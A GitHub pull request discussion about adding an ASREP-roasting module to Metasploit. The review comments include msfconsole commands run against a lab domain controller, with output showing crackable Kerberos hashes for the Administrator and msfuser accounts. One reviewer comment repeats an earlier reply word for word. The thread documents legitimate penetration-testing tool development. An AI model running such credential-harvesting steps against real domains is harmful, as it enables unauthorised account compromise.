Add a specific module to perform ASREP-roasts

[smashery]

This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two different mechanisms:

• Brute force using a file full of usernames
• LDAP query to request the relevant usernames, followed by requesting TGTs

Both of these features existed within Metasploit (kerberos_login and ldap_query), but they weren't easily discoverable.

I've forced the LDAP auth default to NTLM, since domain controllers don't accept the default plaintext auth method.

Verification

• Start msfconsole
• use asrep
• Create a file with a username of a user that is ASREP-roastable
• run action=BRUTE_FORCE user_file=<file> rhost=<rhost> domain=<domain> rhostname=<hostname>
• Verify that this finds the user, and displays a value that can be cracked by Hashcat
• run action=LDAP rhost=<host> username=<ldap username> password=<ldap password> ldap::auth=kerberos domain=<domain> domaincontrollerrhost=<domain ip> rhostname=<hostname>
• Verify that this finds all pre-auth-less users, and displays a value that can be cracked by Hashcat
• Set USE_RC4_HMAC to false
• Verify that it requests a ticket with the default etypes, and displays a $18$ hash

[jheysel-r7]

Thanks for the PR @smashery! Looking good so far, just a couple minor comments.

I was running into some issues actually get hashes back from the target despite users being reported as ASREP-roastable,. Was wondering if you might have any thoughts / suggestions?

msf6 auxiliary(gather/asrep) > run action=LDAP rhost=172.16.199.200 username=Administrator password=N0tpassword! domain=kerberos.issue rhostname=dc2.kerberos.issue
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue

[-] Administrator reported as ASREP-roastable, but received error when attempting to retrieve TGT
[-] msfuser reported as ASREP-roastable, but received error when attempting to retrieve TGT

[*] Query returned 2 results.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=172.16.199.200 domain=kerberos.issue rhostname=dc2.kerberos.issue domaincontrollerrhost=172.16.199.200
[*] Running module against 172.16.199.200

[-] No users found without preauth required
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > cat /tmp/users.txt
[*] exec: cat /tmp/users.txt

Administrator
msfuser

[smashery]

Thanks @jheysel-r7 - I've incorporated all your suggested changes.

I'm curious about the failure to retrieve the user accounts. It could be any number of Kerberos errors that would be entirely expected: disabled account, clock skew between your MSF host and the DC, disabled encryption types; but it could also potentially be a bug. I've added logging of the error description to help users diagnose the root cause of each failure. Are you able to pull the latest changes (I added logging of the error description) and let me know what the error is please? (And maybe also Windows version).

[smcintyre-r7]

Does this have to be registered because there's a problem when it's left at its default value of auto?

[smashery]

Yeah, if it's auto, it just uses plaintext, which isn't supported on domain controllers, so it just fails. Given this won't be run on non-DC LDAP servers, I think that's a reasonable default.

[jheysel-r7]

Thanks for the speedy reply @smashery! My apologies - I was setting the Rhostname datastore option to the hostname + the domain name: dc2.kerberos.issue which was causing the following error to be thrown:
Kerberos Error - KDC_ERR_S_PRINCIPAL_UNKNOWN (7) - Server not found in Kerberos database

My confusion was stemming from when using the psexec module with kerberos authentication, you can set SMB::Rhostname to dc2.kerberos.issue or dc2 and the module runs successfully.

I was able to get this module running successfully by setting Rhostname to either a valid SPN like ldap/dc2.kerberos.issue or just the hostname dc2.

Anyways sorry for the confusion. The module is running fine when the action is set to LDAP but when set to BRUTRE_FORCE I'm getting a NoMethodError for pluralize. Did you maybe forget to push a commit? I also didn't see the error logging you had mentioned you added.

msf6 auxiliary(gather/asrep) > run
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue

[email protected]:984cb08c7b3c15bf30fc7efeeb100661$091ceb0bc5daf43fd65b4eb55fbd6f0684c413a364031f3b8c8d9ce82618884d3aa45c2f4825a8dcf836c9c928d81bd621abd94238a151e08bf89f6c6f86780d069229a3e9fcbea0b3d4e0767efc6f53817b8b5625d12dc253773f56adbf68cd2fdcd12e71a83be4823b23b8e5761e19e7bcd42439bd26f9ff204f4f3adbcd8b8f950e5e62d62d600636318831dd4336bf8f3e27bc30fea805d779e36d2e94cb029185fd25c0591ea2180de845bd99e8d38484924d9e84f7cbc2c973d8292abcd28e5879f168f5700ef5e0e19b0d73ec2978cc2cdb42077e2f61919424935e4461758c43be573d19d88341906855537ff461b03b20db00d70443971460921c045d21dc35eb
[email protected]:f5d4cf6a878e94cd3245be3f832da774$50c140b5664c19843052fcf4f750a1f01f387edd6f09c55ae13f4f728154d0b82b27f8a2d6bb4d473e7b7dd86c053ed61667e349ec4c3d966bf7fcdbaee2b2d5d68d4c5e503d8cd454b97d927374b4c755735b13a5d48a18bbc7f0c00428d6dea9ad8e97dbd877a2d4283b8c600d438044954c66d7458df9da8f998d039f196f027ae3810a991f38643e6472050f4b9790156487ea1e1f6b7f53fde48289d060f29d925a2987b0d7c3009a5800dbfa5a2f3b63351b290e48fb8fcc28836c84b5095fcdcdafeed8f9a299e90335ec7fbb50def876b0cb199185baaa571dd263258732720c58dd860c30a56743ed8a8820f0481480e0f1d58cfe0ee34b7875371c8a66f48437ca

[*] Query returned 2 results.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > set action BRUTE_FORCE
action => BRUTE_FORCE
msf6 auxiliary(gather/asrep) > run
[*] Running module against 172.16.199.200

[email protected]:d4f4898a93d7e042e0603181f861ebab$048f54ad9817886429c1fc0f0af22757c6783fb08cb8dc7b5b28feb6282863b0e225866480ee8342c8d5e60d16230db40c997b54ae6f35cee015765b8fa446cd3827b9218640665242a65369d11e25bd17dba23d33b5e15c4e4350877983743fa74dd49775f7bd38e8ceeab887b329eaab89614be262e4acc2ca479c6270f9f4e3649234ca7437e29529cc47cfc359e294bbc0b6b46ad00da0f7b0e9f6f9924484aa895f3548d9f6c65bc8b0e208001aca60f63549ca4276dbf7a47bb8affc5dbf3c7fecd470b984d973020f974c187f392cd926000bbd3c1614f94fc3cbd42bd9c8c0334e1b8a105662c529c856387f119f57376c06f11959290517833e084bd0dce9c405f8
[email protected]:8484e0f20b4c0e49a7561b7b94b015e2$7aeb2174394da52ad1f9f7650afc866ae5449a4628e0593164707907a7c626eafc8fe6b9f1f5b145cefcd70c853e094c3013d71d2357aceb13370579e4a7822d3e93071aa27cd338e7a4f5c3fb8a79e1f20628756afa611f8e7535e5f5616fb9e7c0589fb15c557449f730f25eca07626099d1079b6041924f3426d5c187ee64935ff13a5a40c20e8e9191ac015740de1aa10e6781e616c2bf74e4ee5950dce9f6bb861746eb141f3e97b20458ad827dcbd239ba4e4332aacba554ad05bc81272679958d9a665dcab70f770ff12e225d727a223d7eca6cf5640a07bf79135f967636a2068e70f96f0d124d3ce8014d9e0659f4ff4362e55f0c1510157a60e053eb7b8efceab8

[-] Auxiliary failed: NoMethodError undefined method `pluralize' for #<Module:auxiliary/gather/asrep <redacted>
[-] Call stack:
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/auxiliary/gather/asrep.rb:90:in `run_brute'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/auxiliary/gather/asrep.rb:65:in `run'
[*] Auxiliary module execution completed

[smashery]

Thanks - yeah, I mistakenly added buggy pluralize to the BRUTE_FORCE code path, but tested in the LDAP one, so hadn't noticed this was never a valid change. Fixed now, and tested properly.

[jheysel-r7]

Thanks - yeah, I mistakenly added buggy pluralize to the BRUTE_FORCE code path, but tested in the LDAP one, so hadn't noticed this was never a valid change. Fixed now, and tested properly.

Thanks @smashery! Spencer just had two minor comments about datastore options, but once those are resolved I think this is ready to land 🚀

[jheysel-r7]

Release Notes

This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.